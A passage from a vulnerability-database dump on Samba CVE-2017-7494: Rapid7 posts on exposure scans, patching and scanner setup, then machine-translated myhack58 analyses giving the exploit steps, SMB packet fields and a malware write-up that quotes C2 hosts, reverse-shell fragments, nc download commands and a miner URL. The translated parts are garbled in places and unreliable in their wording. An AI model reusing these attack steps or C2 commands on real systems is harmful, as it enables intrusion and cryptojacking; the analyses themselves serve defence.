It should be noted that proof-of-concept exploit code has already appeared on Twitter, and we are seeing Metasploit modules making their way into the community.</span></p><p style=\"min-height: 8pt; padding: 0px;\"> </p><p><span style=\"color: black;\">We will continue to scan for potentially vulnerable endpoints and will provide an update on numbers in the next few days.</span></p><p style=\"min-height: 8pt; padding: 0px;\"> </p><p><strong><span style=\"text-decoration: underline;\">RESEARCH UPDATE – 5/25/17</span> – </strong>We have now run a scan on port 139, which also exposes Samba endpoints. We found very similar numbers to those for the scan of port 445. <strong>On port 139, we found approximately 110,000 internet-exposed endpoints running vulnerable versions of Samba.</strong> Of these, about 91% (99,645) are running older, unsupported versions of Samba (pre-4.4).</p><p style=\"min-height: 8pt; padding: 0px;\"> </p><p><a href=\"https://community.rapid7.com/servlet/JiveServlet/showImage/38-7892-67042/Samba+139+major_minor_vulnerable_version_counts_updated.png\"><img alt=\"Samba 139 major_minor_vulnerable_version_counts_updated.png\" class=\"image-2 jive-image\" height=\"524\" src=\"https://community.rapid7.com/servlet/JiveServlet/downloadImage/38-7892-67042/1600-524/Samba+139+major_minor_vulnerable_version_counts_updated.png\" style=\"width: 620px; height: 204px;\" width=\"1600\"/></a></p><p style=\"min-height: 8pt; padding: 0px;\"> </p><p style=\"min-height: 8pt; padding: 0px;\"> </p><h2>What should you do to protect yourself?</h2><p>The makers of Samba have <a class=\"jive-link-external-small\" href=\"https://community.rapid7.com/external-link.jspa?url=https%3A%2F%2Fwww.samba.org%2Fsamba%2Fhistory%2Fsecurity.html\" rel=\"nofollow\" target=\"_blank\">provided a patch for versions 4.4 onwards</a><span style=\"color: black;\">.</span></p><p style=\"min-height: 8pt; padding: 0px;\"> </p><p><span style=\"color: black;\">A workaround for unsupported and 
vulnerable older versions (3.5.x to 4.4.x) is available, and that same workaround can also be used for supported versions that cannot upgrade. We also recommend that users of older, affected versions upgrade to a more recent, supported version of Samba (4.4 or later) and then apply the available patch. </span></p><p style=\"min-height: 8pt; padding: 0px;\"> </p><p><span style=\"color: black;\">Organizations should be reviewing their official asset and configuration management systems to immediately identify vulnerable systems and then perform comprehensive and regular full network vulnerability scans to identify misconfigured or rogue systems. Additionally, organizations should review their firewall rules to ensure that SMB/Samba network traffic is not allowed directly from the internet to their assets.</span></p><p style=\"min-height: 8pt; padding: 0px;\"> </p><p><span style=\"color: black;\">Many network-attached storage (NAS) environments are used as network backup systems. A direct attack or worm would render those backups almost useless, so if patching cannot be done immediately, we recommend creating an offline copy of critical data as soon as possible.</span></p><p style=\"min-height: 8pt; padding: 0px;\"> </p><p><span style=\"color: black;\">In addition, organizations should be monitoring all internal and external network traffic for increases in connections or connection attempts to Windows file sharing protocols.</span></p><p style=\"min-height: 8pt; padding: 0px;\"> </p><h2>How can Rapid7 help?</h2><p>We are working on checks for <a class=\"jive-link-external-small\" href=\"https://community.rapid7.com/external-link.jspa?url=https%3A%2F%2Fwww.rapid7.com%2Fproducts%2Finsightvm%2F\" target=\"_blank\">Rapid7 InsightVM</a> and <a class=\"jive-link-external-small\" href=\"https://community.rapid7.com/external-link.jspa?url=https%3A%2F%2Fwww.rapid7.com%2Fproducts%2Fnexpose%2F\" target=\"_blank\">Rapid7 Nexpose </a><span style=\"color: black;\">so customers can 
scan their environments for vulnerable endpoints and take mitigating action as quickly as possible.</span></p><p style=\"min-height: 8pt; padding: 0px;\"> </p><p><span style=\"color: black;\">We also expect a module in the <a class=\"jive-link-external-small\" href=\"https://community.rapid7.com/external-link.jspa?url=https%3A%2F%2Fwww.rapid7.com%2Fproducts%2Fmetasploit%2F\" target=\"_blank\">Metasploit Framework</a></span><span style=\"color: black;\"> very soon, enabling security professionals to test the effectiveness of their mitigations, and understand the potential impact of exploitation.</span></p><p style=\"min-height: 8pt; padding: 0px;\"> </p><p><span style=\"color: black;\">We will notify users of the availability of these solutions as soon as they are available.</span></p><p style=\"min-height: 8pt; padding: 0px;\"> </p><p><strong><span style=\"text-decoration: underline;\">PRODUCT UPDATE – 5/25/17</span> –</strong> We have authenticated checks available for Samba CVE-2017-7494 in Rapid7 InsightVM and Rapid7 Nexpose.  The authenticated checks relate to vendor-specific fixes as follows:</p><ul style=\"list-style-type: disc;\"><li>ubuntu-cve-2017-7494</li><li>debian-cve-2017-7494</li><li>freebsd-cve-2017-7494</li><li>oracle_linux-cve-2017-7494</li><li>redhat_linux-cve-2017-7494</li><li>suse-cve-2017-7494</li></ul><p style=\"min-height: 8pt; padding: 0px;\"> </p><p><span style=\"text-decoration: underline;\"><strong>PRODUCT UPDATE 2 – 5/25/17</strong> </span>– We now have both authenticated and unauthenticated remote checks in Rapid7 InsightVM and Rapid7 Nexpose. In the unauthenticated cases we use anonymous or guest login to gather the required information, and on systems that are hardened against that kind of login, the authenticated remote check is available.</p><p style=\"min-height: 8pt; padding: 0px;\"> </p><p>Not a Rapid7 customer? 
<a class=\"jive-link-external-small\" href=\"https://community.rapid7.com/external-link.jspa?url=https%3A%2F%2Fwww.rapid7.com%2Fproducts%2Finsightvm%2Fdownload%2F\" target=\"_blank\">Scan your network with InsightVM</a> to understand the impact this vulnerability has on your organization. We also have a <a class=\"jive-link-blog-small\" data-containerId=\"1004\" data-containerType=\"37\" data-objectId=\"7895\" data-objectType=\"38\" href=\"https://community.rapid7.com/community/nexpose/blog/2017/05/25/scanning-and-remediating-samba-cve-2017-7494-in-insightvm-and-nexpose\">step-by-step guide on how to scan</a> for Samba CVE-2017-7494 using our vulnerability scanners.</p><p style=\"min-height: 8pt; padding: 0px;\"> </p><p><span style=\"text-decoration: underline;\"><strong>PRODUCT UPDATE 3 - 5/25/17</strong> </span>- We now have <a class=\"jive-link-external-small\" href=\"https://community.rapid7.com/external-link.jspa?url=https%3A%2F%2Fwww.rapid7.com%2Fdb%2Fmodules%2Fexploit%2Flinux%2Fsamba%2Fis_known_pipename\" target=\"_blank\">a Metasploit module available</a> for this vulnerability, so you can see whether you can be exploited via Samba CVE-2017-7494, and understand the impact of such an attack. <a class=\"jive-link-external-small\" href=\"https://community.rapid7.com/external-link.jspa?url=https%3A%2F%2Fwww.rapid7.com%2Fproducts%2Fmetasploit%2Fdownload%2F\" target=\"_blank\">Download Metasploit to try it out.</a></p><p style=\"min-height: 8pt; padding: 0px;\"> </p><p><em>P.S. yes, we know the lion is called Simba. But who doesn't love a gratuitous and tenuous cartoon lion reference?! Rowr. 
</em></p></div><!-- [DocumentBodyEnd:be7d6c8c-369f-4dc9-8d63-ac0622dfbc33] -->", "modified": "2017-05-27T02:51:04", "published": "2017-05-27T02:51:04", "href": "https://community.rapid7.com/community/infosec/blog/2017/05/25/patching-cve-2017-7494-in-samba-it-s-the-circle-of-life", "id": "RAPID7COMMUNITY:70F4A599D7DDC69173F490543EA5873E", "title": "Patching CVE-2017-7494 in Samba: It\u2019s the Circle of Life", "type": "rapid7community", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2017-06-10T11:14:55", "bulletinFamily": "blog", "cvelist": ["CVE-2017-7494"], "description": "<!-- [DocumentBodyStart:6c3fb3b9-ef2f-4db7-89c0-fcd508c9910a] --><div class=\"jive-rendered-content\"><p style=\"margin-bottom: .0001pt; background: white;\"><span style=\"font-size: 11.0pt; font-family: 'Arial',sans-serif; color: black;\">Just when you’d finished wiping away your <a class=\"jive-link-blog-small\" data-containerId=\"5165\" data-containerType=\"37\" data-objectId=\"7869\" data-objectType=\"38\" href=\"https://community.rapid7.com/community/infosec/blog/2017/05/12/wanna-decryptor-wncry-ransomware-explained\">WannaCry</a> tears, the interwebs dropped another bombshell: a nasty Samba vulnerability, CVE-2017-7494 (no snazzy name as of the publishing of this blog, but hopefully something with a Lion King reference will be created soon).</span></p><p style=\"min-height: 8pt; padding: 0px; background: white;\"> </p><p style=\"background: white;\"><span style=\"color: black; font-weight: inherit; font-size: 11.0pt; font-family: 'Arial',sans-serif; font-style: inherit;\">As with WannaCry, we wanted to keep this simple. 
First, check out Jen Ellis's <a class=\"jive-link-blog-small\" data-containerId=\"5165\" data-containerType=\"37\" data-objectId=\"7892\" data-objectType=\"38\" href=\"https://community.rapid7.com/community/infosec/blog/2017/05/25/patching-cve-2017-7494-in-samba-it-s-the-circle-of-life\">overview of the Samba vulnerability</a>, and then review the below steps to quickly scan for this vulnerability on your own infrastructure</span><span style=\"color: black; font-weight: inherit; font-size: 11.0pt; font-family: 'Arial',sans-serif; font-style: inherit;\"> and create a dynamic asset group for tagging and reporting. If<span style=\"color: black; font-weight: inherit; font-size: 11.0pt; font-family: 'Arial',sans-serif; font-style: inherit;\"> you aren’t already a customer, you can </span><span style=\"color: black; font-weight: inherit; font-size: 11.0pt; font-family: 'Arial',sans-serif; font-style: inherit;\"><a class=\"jive-link-external-small\" href=\"https://community.rapid7.com/external-link.jspa?url=https%3A%2F%2Fwww.rapid7.com%2Fproducts%2Finsightvm%2Fdownload%2F\" target=\"_blank\">use this free trial</a> to scan for the Samba vulnerability across your environment.</span></span></p><p style=\"min-height: 8pt; padding: 0px;\"> </p><p style=\"margin-bottom: .0001pt; background: white;\"><span style=\"font-size: 11.0pt; font-family: 'Arial',sans-serif; color: black;\">Authenticated checks are live in <a class=\"jive-link-external-small\" href=\"https://community.rapid7.com/external-link.jspa?url=http%3A%2F%2Fwww.rapid7.com%2Fproducts%2Fnexpose\" target=\"_blank\">Nexpose</a> and <a class=\"jive-link-external-small\" href=\"https://community.rapid7.com/external-link.jspa?url=http%3A%2F%2Fwww.rapid7.com%2Fproducts%2Finsightvm\" target=\"_blank\">InsightVM</a>, as well as unauthenticated and authenticated remote checks.</span></p><p style=\"min-height: 8pt; padding: 0px;\"> </p><p style=\"background: white;\"><span style=\"color: black; font-weight: inherit; 
font-size: 11.0pt; font-family: 'Arial',sans-serif; font-style: inherit;\">Here is the InsightVM/Nexpose step-by-step guide to create a scan template specifically to look for CVE-2017-7494:</span></p><p style=\"min-height: 8pt; padding: 0px;\"> </p><p>1. Under administration, go to manage templates.</p><p style=\"min-height: 8pt; padding: 0px; margin-bottom: .0001pt; background: white;\"> </p><p style=\"margin-bottom: .0001pt; background: white;\"><span style=\"font-size: 11.5pt; font-family: 'Arial',sans-serif; color: #231f20;\"> <a href=\"https://community.rapid7.com/servlet/JiveServlet/showImage/38-7895-67044/pastedImage_6.png\"><img class=\"image-1 jive-image\" height=\"161\" src=\"https://community.rapid7.com/servlet/JiveServlet/downloadImage/38-7895-67044/758-161/pastedImage_6.png\" style=\" width: 866.107px;\" width=\"758\"/></a></span></p><p style=\"min-height: 8pt; padding: 0px;\"> </p><p><span style=\"color: black; font-weight: inherit; font-size: 11.0pt; font-family: 'Arial',sans-serif; font-style: inherit;\">2. Copy the following template: Full Audit enhanced logging without Web Spider. 
Don’t forget to give your copy a name and description!</span></p><p style=\"min-height: 8pt; padding: 0px;\"> </p><p style=\"margin-bottom: .0001pt; background: white;\"><a href=\"https://community.rapid7.com/servlet/JiveServlet/showImage/38-7895-67046/pastedImage_8.png\"><img class=\"image-2 jive-image\" height=\"181\" src=\"https://community.rapid7.com/servlet/JiveServlet/downloadImage/38-7895-67046/1600-181/pastedImage_8.png\" style=\"max-width:1600px; max-\" width=\"1600\"/></a></p><p style=\"margin-bottom: .0001pt; background: white;\"><a href=\"https://community.rapid7.com/servlet/JiveServlet/showImage/38-7895-67047/pastedImage_9.png\"><img class=\"image-3 jive-image\" height=\"379\" src=\"https://community.rapid7.com/servlet/JiveServlet/downloadImage/38-7895-67047/758-379/pastedImage_9.png\" style=\" width:758px;\" width=\"758\"/></a></p><p style=\"min-height: 8pt; padding: 0px;\"> </p><p><span style=\"font-size: 11.0pt; font-family: 'Arial',sans-serif; color: black;\">3. </span><span style=\"font-size: 11pt; font-family: Arial, sans-serif; color: black; background-position: initial;\">Click on Vulnerability Checks and then “By Individual Check”</span></p><p style=\"min-height: 8pt; padding: 0px;\"> </p><p><span style=\"font-size: 11pt; font-family: Arial, sans-serif; color: black; background-position: initial;\"><a href=\"https://community.rapid7.com/servlet/JiveServlet/showImage/38-7895-67048/pastedImage_10.png\"><img class=\"jive-image image-4\" height=\"294\" src=\"https://community.rapid7.com/servlet/JiveServlet/downloadImage/38-7895-67048/758-294/pastedImage_10.png\" style=\" width: 825.809px;\" width=\"758\"/></a></span></p><p style=\"min-height: 8pt; padding: 0px;\"> </p><p><span style=\"font-family: 'Arial',sans-serif; color: black;\">4. 
</span><span style=\"font-family: 'Arial',sans-serif; color: black; background: white;\">Add Check “</span><span style=\"font-family: 'Arial',sans-serif;\">CVE-2017-7494”<span style=\"color: black; background: white;\"> and click save.</span></span></p><p style=\"min-height: 8pt; padding: 0px;\"> </p><p><span style=\"font-family: 'Arial',sans-serif; color: black; background: white;\"> <a href=\"https://community.rapid7.com/servlet/JiveServlet/showImage/38-7895-67049/pastedImage_11.png\"><img class=\"image-5 jive-image\" height=\"330\" src=\"https://community.rapid7.com/servlet/JiveServlet/downloadImage/38-7895-67049/758-330/pastedImage_11.png\" style=\" width: 980.519px;\" width=\"758\"/></a></span></p><p style=\"margin-bottom: .0001pt; background: white;\"><span style=\"font-size: 11.0pt; font-family: 'Arial',sans-serif; color: black;\">This should come back with 41 checks that are related to CVE-2017-7494.</span></p><p style=\"min-height: 8pt; padding: 0px; margin-bottom: .0001pt; background: white;\"> </p><p style=\"background: white;\"><span style=\"color: black; font-size: 11.0pt; font-family: 'Arial',sans-serif;\">5. <strong>Save the template</strong> and run a scan to identify all assets with CVE-2017-7494.</span></p><p style=\"min-height: 8pt; padding: 0px;\"> </p><h2 style=\"text-align: justify; background: white;\"><span style=\"font-family: 'Arial',sans-serif; color: #e95f26;\">Creating a Dynamic Asset Group for </span><span style=\"font-family: 'Arial',sans-serif; color: #ed7d31;\">CVE-2017-7494</span></h2><p style=\"background: white;\"><span style=\"color: #231f20; font-weight: inherit; font-family: 'Arial',sans-serif; font-style: inherit;\">Now that you have your assets scanned, you may want to create a Dynamic Asset Group off of which to report/tag off of that will update itself whenever new assets are found with this vulnerability (and when they are fixed). 
To get started, click on the filter icon in the top right of the <span style=\"color: #303030;\">InsightVM </span>console, just under the search button.</span></p><p style=\"min-height: 8pt; padding: 0px; background: white;\"> </p><p><a href=\"https://community.rapid7.com/servlet/JiveServlet/showImage/38-7895-67050/pastedImage_12.png\"><img class=\"image-6 jive-image\" height=\"116\" src=\"https://community.rapid7.com/servlet/JiveServlet/downloadImage/38-7895-67050/pastedImage_12.png\" style=\"max-width:413px; max-\" width=\"413\"/></a></p><p style=\"min-height: 8pt; padding: 0px; margin-bottom: .0001pt; background: white;\"> </p><p style=\"margin-bottom: .0001pt; background: white;\"><span style=\"font-family: 'Arial',sans-serif; color: black;\">Now, use the \"CVE ID\" filter to specify the CVE:</span></p><p style=\"min-height: 8pt; padding: 0px; margin-bottom: .0001pt; background: white;\"> </p><p style=\"margin-bottom: .0001pt; background: white;\"><a href=\"https://community.rapid7.com/servlet/JiveServlet/showImage/38-7895-67051/pastedImage_13.png\"><img class=\"image-7 jive-image\" height=\"182\" src=\"https://community.rapid7.com/servlet/JiveServlet/downloadImage/38-7895-67051/758-182/pastedImage_13.png\" style=\" width: 1036.11px;\" width=\"758\"/></a></p><p style=\"min-height: 8pt; padding: 0px; background: white;\"> </p><p style=\"background: white;\"><span style=\"font-size: 11.5pt; font-family: 'Arial',sans-serif; color: #231f20;\">This asset group can now be used for reporting as well as tagging to quickly identify exposed systems.</span></p><p style=\"min-height: 8pt; padding: 0px;\"> </p><p style=\"background: white;\"><span style=\"color: black; font-weight: inherit; font-size: 11.0pt; font-family: 'Arial',sans-serif; font-style: inherit;\">Using these steps, you’ll be able to quickly scan as well as report on the Samba vulnerability. 
Let us know if you have any more questions!</span></p></div><!-- [DocumentBodyEnd:6c3fb3b9-ef2f-4db7-89c0-fcd508c9910a] -->", "modified": "2017-05-25T21:22:37", "published": "2017-05-25T21:22:37", "href": "https://community.rapid7.com/community/nexpose/blog/2017/05/25/scanning-and-remediating-samba-cve-2017-7494-in-insightvm-and-nexpose", "id": "RAPID7COMMUNITY:38689BEB2152AB6F6A52F8E26AA1499F", "title": "Samba CVE-2017-7494: Scanning and Remediating in InsightVM and Nexpose", "type": "rapid7community", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "myhack58": [{"lastseen": "2017-05-25T17:49:44", "bulletinFamily": "info", "cvelist": ["CVE-2017-7494"], "edition": 1, "description": "Author: cyg07 && redrain\n\n## Overview\n\nOn May 24, 2017, Samba released version 4.6.4, which fixes a serious remote code execution vulnerability, numbered CVE-2017-7494. The vulnerability affects the Samba versions between 3.5.0 and 4.6.4/4.5.10/4.4.14. The 360 Network Security Center and the Gear Team of 360 information security analyzed the vulnerability as soon as it was announced and confirmed that it is a serious vulnerability that can lead to remote code execution.\n\n## Technical analysis\n\nAs the official advisory describes, the vulnerability only requires a Samba user with write permission, who can then escalate to root privileges on the samba server, because samba runs as the root user by default.\n\nJudging from the patch, the problem arises in the is_known_pipename function when the pipename contains a path symbol:\n\n! [](/Article/UploadPic/2017-5/2017525114112452. png)\n\nFurther down, the smb_probe_module function then loads the dll uploaded by the attacker, which leads to the arbitrary code execution described in the announcement:\n\n! [](/Article/UploadPic/2017-5/2017525114112658. png)\n\nSpecific attack process:\n\n1. 
Construct a\u2019/\u2019 symbol pipes the name or path name, such as \u201c/home/toor/cyg07. so\u201d\n2. Via the smb Protocol the initiative to let the server smb return the FID\n3. The subsequent direct request from the FID into the above mentioned malicious processes\n\nThe specific result of the attack is as follows:\n\n1. Try to load \u201c/home/toor/cyg07. so\u201d maliciously so! [](/Article/UploadPic/2017-5/2017525114113647. png)\n2. Which the so the code is as follows(when loaded will call samba_init_module export function)! [](/Article/UploadPic/2017-5/2017525114113327. png)\n3. Finally, we can be in/tmp/360sec seen the actual execute permissions(with root permissions)! [](/Article/UploadPic/2017-5/2017525114113328. png)\n\n**[1] [[2]](<86440_2.htm>) [next](<86440_2.htm>)**\n", "modified": "2017-05-25T00:00:00", "published": "2017-05-25T00:00:00", "href": "http://www.myhack58.com/Article/html/3/62/2017/86440.htm", "id": "MYHACK58:62201786440", "title": "Samba remote code execution vulnerability(CVE-2017-7494)analysis-vulnerability warning-the black bar safety net", "type": "myhack58", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2017-05-27T17:50:34", "bulletinFamily": "info", "cvelist": ["CVE-2017-7494"], "edition": 1, "description": "0x01 Intro \nOn May 24, 2017, Samba officially released a security bulletin: the new release, Samba 4.6.4, fixes a serious code execution vulnerability (CVE-2017-7494) that affects all Samba versions between 3.5.0 and 4.6.4/4.5.10/4.4.14. Because of a validation bug in rpc_server/srv_pipe.c, an attacker can use a client to upload a malicious dynamic library file to a shared directory on which they have write permission; after the attacker issues a request, the server loads and runs the illegal module from outside the Samba directory, resulting in malicious code execution. 
\nSamba is a kind of used to allow UNIX series the[operating system](<http://www.myhack58.com/Article/48/Article_048_1.htm>)with the Microsoft Windows operating system of the SMB/CIFS network Protocol to do link free software. Many business or personal NAS(Network Attached Storage), routers and other IOT devices storage solutions will choose the open source software Samba to provide data access services. IPC$(Internet Process Connection) is a shared \u201cnamed pipe\u201d resources, allowing the user anonymous access to the Samba server's shared resources. \n0x02 vulnerability analysis \nBased on 360 days eye laboratory full network scan of the data show that the current Chinese mainland and Hong Kong and Macao open 445 port the IP number is 18883, wherein the Samba service Co-4433, and the Samba version of the fall in the loophole version of the interval IP number is 3765, accounted for Samba service 85% from! Taiwan, Hong Kong, respectively, to 1767, in 1853, the remaining provinces of the distribution as shown below. \n! [](/Article/UploadPic/2017-5/201752805553863. png? www. myhack58. com) \n0x03 vulnerability validation and analysis \nEnvironment preparation: \n! [](/Article/UploadPic/2017-5/201752805553685. png? www. myhack58. com) \nUsing the Metasploit open the exploits module(is_known_pipename)for testing. Download: https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/linux/samba/is_known_pipename.rb \nAttack process: \n1\\. To have write access to the Samba server share directory to upload malicious dynamic library, here named evil. so; \n2\\. The attacker violence guess the shared directory absolute path, while to the IPC$(a named pipe)resources request step 1 Upload a malicious dynamic library, the file name changes on the server the absolute path\u201d /path/to/evil. so\u201d; \n3\\. Server Error the resource file \u201d /path/to/evil. so\u201d as the IPC$(a named pipe)resource loading operation, the vulnerability is triggered. 
\n1\uff09Upload a malicious dynamic library files to the server shared directory public \n! [](/Article/UploadPic/2017-5/201752805553640. png? www. myhack58. com) \nArticle 51 a packet Write AndX Request write request data, as shown below: \nSMB (Server Message Block Protocol) \nSMB Header \nServer Component: SMB \n[Response in: 52] \nSMB Command: Write AndX (0x2f) \nError Class: Success (0x00) \n... \nTree ID: 51295 (\\\\\\192.168.119.155\\public) #to access the drone of the shared file path of the Tree ID \nProcess ID: 51988 \nUser ID: 62509 \nMultiplex ID: 27235 \nWrite AndX Request (0x2f) \nWord Count (WCT): 14 \nAndXCommand: No further commands (0xff) \nReserved: 00 \nAndXOffset: 0 \nFID: 0xef37 (\\rDfDKbgV. so) # malicious dynamic library file FID \n... \n[File RW Length: 476] #write the file size \nByte Count (BCC): 476 \nData (476 bytes) #upload binary data \nData: 7f454c4602010100000000000000000003003e0001000000... \n[Length: 476] \n2 to a named pipe request malicious dynamic library \n! [](/Article/UploadPic/2017-5/201752805553810. png? www. myhack58. com) \nThe first 59 a packet NT Create AndX request request named pipe resource data, as follows: \nSMB (Server Message Block Protocol) \nSMB Header \nServer Component: SMB \nSMB Command: NT Create AndX (0xa2) \n... 
\nTree ID: 19967 (\\\\\\192.168.119.155\\IPC$) #here use the Named Pipes mode is very important \nProcess ID: 51988 \nUser ID: 62509 \nMultiplex ID: 27235 \nNT Create AndX Request (0xa2) \nWord Count (WCT): 24 \nAndXCommand: No further commands (0xff) \nReserved: 00 \nAndXOffset: 0 \nReserved: 00 \n\n\n**[1] [[2]](<86521_2.htm>) [next](<86521_2.htm>)**\n", "modified": "2017-05-28T00:00:00", "published": "2017-05-28T00:00:00", "href": "http://www.myhack58.com/Article/html/3/62/2017/86521.htm", "id": "MYHACK58:62201786521", "title": "Samba remote code execution vulnerability(CVE-2017-7494)-SambaCry analysis report-vulnerability warning-the black bar safety net", "type": "myhack58", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2017-06-13T16:18:34", "bulletinFamily": "info", "cvelist": ["CVE-2017-7494"], "edition": 1, "description": "\u201c2017 5 May 24, Samba released a 4. 6. 4 version, in the middle fix a serious remote code execution vulnerability, the vulnerability number CVE-2017-7494, the vulnerability affects Samba 3.5.0 after to 4. 6. 4/4. 5. 10/4. 4. 14 in the middle of all versions.\n\nSambaCry vulnerability is a scale spread of the worm nature of the vulnerability, the recent Kaspersky Security lab by the honeypot to capture a SambaCry vulnerability to malicious use bot to block even the digital currency bitcoin mining of the attack.\n\nExploit \nBecause the vulnerability requires the smb shared drive letter has to be written permission from the Kaspersky Lab honeypot to capture the attack packets point of view, the attacker first the server attempts to write to a random character name of the file, after the success of the deletion. \n! [](/Article/UploadPic/2017-6/201761320335502. png? www. myhack58. com) \nIn the detection of the successful have write permissions, the attacker violence guess write the file's full path to get the shared directory path, and write a malicious lib as a payload in. \n! [](/Article/UploadPic/2017-6/201761320335906. 
png? www. myhack58. com) \nIn blasting to the correct path, then use CVE-2017-7494 vulnerability to load a malicious lib execute the command, because the samba default is root permissions to start, so after loading the lib command executed with root permissions, execute, and successfully exploited, then delete write the lib, only in memory to perform malicious command operation. \nMalicious lib sample 349d84b3b176bbc9834230351ef3bc2a_16106. so(INAebsGB. so)and 2009af3fed2a4704c224694dfc4b31dc_30361. so(cblRWuoCc. so) \nSample analysis \nIn INAebsGB. so, the attacker with/bin/sh to perform a very simple rally a shell operation, so execute the downloaded file or execute subsequent commands. \n! [](/Article/UploadPic/2017-6/201761320335566. png? www. myhack58. com) \nFound this lib is actually metasploit is_known_pipename module generated. \nThereafter, the write another libcblRWuoCc. so, in this lib, the attacker, bounce the shell to the C2 Server 4000 port and download a mining program, the bot as the CPU miner to use with this sample, we positioned the C2 server and the mining program. \n! [](/Article/UploadPic/2017-6/201761320335500. png? www. myhack58. com) \n! [](/Article/UploadPic/2017-6/201761320335277. png? www. myhack58. com) \nTo perform acts of: \n\nbash-i \nAttacker Download http://rc. ezreal. space/minerd64_s and stored in/tmp/m to give permission after the nohup execution. \nSimple to the C2 Server query as follows: \nrc. ezreal. space \nA record 149.255.35.33 \nTime IP country Province / the state operator \n2017-05-17 149.255.35.33 Illinois, USA swiftway.net \n2017-05-15 149.255.35.33 Illinois, USA swiftway.net \n2017-04-30 185.86.150.76 Sweden Ciotat Poland \nwww.ezreal.space 191.101.31.100 \ncl. ezreal. space 191.101.31.100 \nrc2. ezreal. space 149.255.35.77 \nrc. ezreal. space 149.255.35.33 \ntypo hacker? \nIn my connection C2 the server rc. ezreal. 
space4000 port, see the following script: \n#!/ usr/bin/env bash \nhost='149.255.35.33'; \nnohup bash-i \nnohuo bash-i \nnohuo bash-i \nAttacker the Want nohup to ignore the system hang up for running in the background, but do not know if the careless hand shake the reason, nohup play into nohuo \nTo access the other three ports, give it a few script: \n\u279c /tmp nc 149.255.35.33 4001 \n#!/ usr/bin/env bash \n#minerd script \nhost='149.255.35.33'; \ntarget=$RANDOM; target+=. so; target=/tmp/$target; \ncat $target && chmod +x $target && nohup $target & \n\u279c /tmp nc 149.255.35.33 4002 \n#!/ usr/bin/env bash \n# process guard script \n\u279c /tmp nc 149.255.35.33 4003 \n#!/ usr/bin/env bash \n# auto start script% \nC2 port 5000 to get to the miner program and from http in download get consistent \nminer analysis \nUntil now, the C2 server is still survival, download minerd64_s and simple analysis, found that is a common CPU mining program miderd but the attacker did not like the common additional parameters, but all parameters are hard-coded into the program puts the need to perform parameters. \n! [](/Article/UploadPic/2017-6/201761320335961. png? www. myhack58. com) \n! [](/Article/UploadPic/2017-6/201761320335667. png? www. myhack58. com) \nHere soon found the attacker's mining pool and wallet address: \n. rodata:0000000000515604 00000026 C stratum+tcp://xmr. crypto-pool. fr:3333 \n. rodata:00000000005156CC 00000060 C 43xtViRHn1oibjS6yZSgS6XhFFkSRGC5shgmymh6ei4r5osjprc1z85beczs89ztl4idgdouheoktcve115wp7sb6xzhmgy \nBy mining pool Transaction query, that the attacker-dug is a cottage currency\u2019XDN\u2019and\u2019XMR\u2019, view recent into the case, found that the earnings also nice:) \nAnother attack \nThe thought that at this point our analysis and the Kaspersky difference not ready to come home from work, but found 360 tracking team also provides a sample of the 1bb17e0d03ebd5acafbe60b70e38dec4. so(oooo. so) \nThe lib and cblRWuoCc. 
so very similar, but the execution of the operation is not the same \n! [](/Article/UploadPic/2017-6/201761320335339. png? www. myhack58. com)\n\n**[1] [[2]](<86995_2.htm>) [next](<86995_2.htm>)**\n", "modified": "2017-06-13T00:00:00", "published": "2017-06-13T00:00:00", "href": "http://www.myhack58.com/Article/html/3/62/2017/86995.htm", "id": "MYHACK58:62201786995", "title": "SambaCry exploit analysis-exploit warning-the black bar safety net", "type": "myhack58", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2017-05-25T17:49:48", "bulletinFamily": "info", "cvelist": ["CVE-2017-7494"], "edition": 1, "description": "Samba is a Linux and UNIX system of the SMB Protocol service software, can be achieved with other[operating system](<http://www.myhack58.com/Article/48/Article_048_1.htm>) such as: Microsoft Windows operating system, file system, printers and other shared resources. The vulnerability of the earliest influence to the 7 ago version, a hacker can exploit the vulnerability for remote code execution. \nVulnerability number \nCVE-2017-7494 \nImpact version \nSamba 3.5. 0 to 4. 6. 4/4. 5. 10/4. 4. 14 the intermediate version \nVulnerability description \nAn attacker could exploit the vulnerability remote code execution, specifically the execution conditions are as follows: \n1\\. The server opens the file/Printer Sharing port 445, so it can be in public access \n2\\. Sharing files has write permissions \n3\\. A malicious attacker need to guess the Samba service end of the shared directory's physical path \nMeet the above conditions, since Samba can be selected for the directory to create a network share, when a malicious client connected to a writable shared directory, by uploading a malicious link library file, so that the service terminal program to load and execute it, in order to achieve remote code execution. 
According to the server, the attacker also possible to root the identity of the execution. \nVulnerability \nThe Samba vulnerability is reminiscent of the stage before sweeping the world of WannaCry vulnerability, the researchers suspect that the vulnerability having the same propagation characteristics. \nIn WannaCry the use of the vulnerability has just appeared, many people think that it does not cause a great impact, because most people don't put file/Printer Sharing ports open to the public, but after holding this idea of people being quickly hit the face, WannaCry virus caused harm beyond everyone's imagination. \nAnd according to Phobus security company's founder, Dan Tentler said that there are 477,000 for the installation of a Samba computer exposed to the 445 port, although we don't know how many runs you can attack the Samba version. Tentler refers to Shodan search results returned. Rapid7 researchers also made statistics, they detected a 110,000 computers running the official no longer provide support for the Samba version, that is not there for these versions of the patch. Therefore, the Samba vulnerability can be caused by the impact can be imagined. \n! [](/Article/UploadPic/2017-5/2017525224351726. jpg? www. myhack58. com) \nBut the Windows are different, the Samba of the SMB function the default is not open, you must manually open. \nOne possible attack scenario is that the hackers first attack in the home network NAS, because NAS is more likely to be the file sharing ports exposed to the public network, then hack further to attack LAN. \nTrojan \nmsf has added a specialized module, you can use this msf module for testing. \n! [](/Article/UploadPic/2017-5/2017525224351595. jpg? www. myhack58. com) \nBug fixes \nThe most secure method or patch or upgrade to Samba 4.6.4/4.5.10/4.4.14 any version, you can refer to here. \nIf temporarily unable to upgrade the version or install the patch, you can use temporary solution: \nIn the smb. 
